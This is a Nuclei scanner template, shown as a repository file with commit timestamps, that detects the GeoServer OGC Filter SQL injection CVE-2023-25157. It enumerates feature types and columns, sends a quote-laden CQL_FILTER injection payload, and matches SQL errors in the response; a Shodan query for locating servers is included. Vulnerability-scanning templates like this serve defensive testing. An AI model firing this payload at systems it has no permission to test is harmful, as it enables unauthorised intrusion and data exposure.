nuclei-templates/http/cves/2023/CVE-2023-25157.yaml

69 lines
2.5 KiB
YAML
Raw Normal View History

2023-06-07 05:58:03 +00:00
id: CVE-2023-25157
info:
name: GeoServer OGC Filter - SQL Injection
author: ritikchaddha,DhiyaneshDK,iamnoooob,rootxharsh
severity: critical
description: |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
reference:
- https://twitter.com/parzel2/status/1665726454489915395
- https://nvd.nist.gov/vuln/detail/CVE-2023-25157
2023-06-07 06:12:54 +00:00
- https://github.com/win3zz/CVE-2023-25157
- https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf
2023-06-07 05:58:03 +00:00
classification:
2023-06-07 06:12:54 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-06-07 05:58:03 +00:00
cve-id: CVE-2023-25157
2023-06-07 06:12:54 +00:00
cwe-id: CWE-89
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
2023-06-07 05:58:03 +00:00
metadata:
verified: "true"
shodan-query: title:"geoserver"
2023-06-07 06:12:54 +00:00
tags: cve,cve2023,geoserver,ogc,sqli,intrusive
2023-06-07 05:58:03 +00:00
http:
- raw:
- |
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
Host: {{Hostname}}
- |
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1
Host: {{Hostname}}
- |
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
iterate-all: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "SQL"
2023-06-07 06:12:54 +00:00
- type: word
part: header_3
words:
- text/xml
2023-06-07 05:58:03 +00:00
extractors:
- type: regex
part: body_1
group: 1
name: name
regex:
- '<FeatureType><Name>(.*?)<\/Name><Title>'
internal: true
- type: regex
part: body_2
group: 1
name: column
regex:
- 'FID,([aA-zZ_]+),'
internal: true